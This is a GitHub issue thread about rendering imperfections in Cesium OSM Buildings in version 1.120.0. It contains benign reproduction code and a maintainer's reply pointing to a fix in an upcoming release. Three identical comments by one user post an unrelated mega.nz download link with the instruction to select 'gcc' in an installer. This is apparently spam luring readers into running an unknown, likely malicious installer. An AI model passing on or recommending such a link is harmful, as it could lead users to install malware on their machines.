### ISSUE TITLE
The OsmBuildings rendering in Cesium 1.120.0 has some imperfections

### ISSUE THREAD

**Issue by danchaotaiyang** [CesiumGS/cesium#12151]
### What happened?

![1](https://github.com/user-attachments/assets/a26be7d4-1107-46af-9139-242f202bd315)
![2](https://github.com/user-attachments/assets/47430856-3fc4-4ab0-b764-fbf35cd68d8f)
![3](https://github.com/user-attachments/assets/ecf0fc39-5e28-400b-b84d-473d78cd5b3e)
![4](https://github.com/user-attachments/assets/328369b1-74ff-44c0-a125-5506f8d7e179)

### Reproduction steps

// Keep your Cesium.Ion.defaultAccessToken = 'your_token_here' line above. 
// STEP 2 CODE
// Initialize the viewer with Cesium World Terrain.
const viewer = new Cesium.Viewer('cesiumContainer', {
  terrain: Cesium.Terrain.fromWorldTerrain(),
});

// Fly the camera to Denver, Colorado at the given longitude, latitude, and height.
viewer.camera.flyTo({
  destination: Cesium.Cartesian3.fromDegrees(-104.9965, 39.74248, 4000)
});

// Add Cesium OSM Buildings.
const buildingsTileset = await Cesium.createOsmBuildingsAsync();
viewer.scene.primitives.add(buildingsTileset);

### Sandcastle example

https://cesium.com/learn/cesiumjs-learn/cesiumjs-interactive-building/

### Environment

Browser:
CesiumJS Version: 1.120.0
Operating System:

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ggetz** [comment]
Thanks for the report @danchaotaiyang!

This was fixed in https://github.com/CesiumGS/cesium/pull/12116. It will be included with the next release on 9/3.
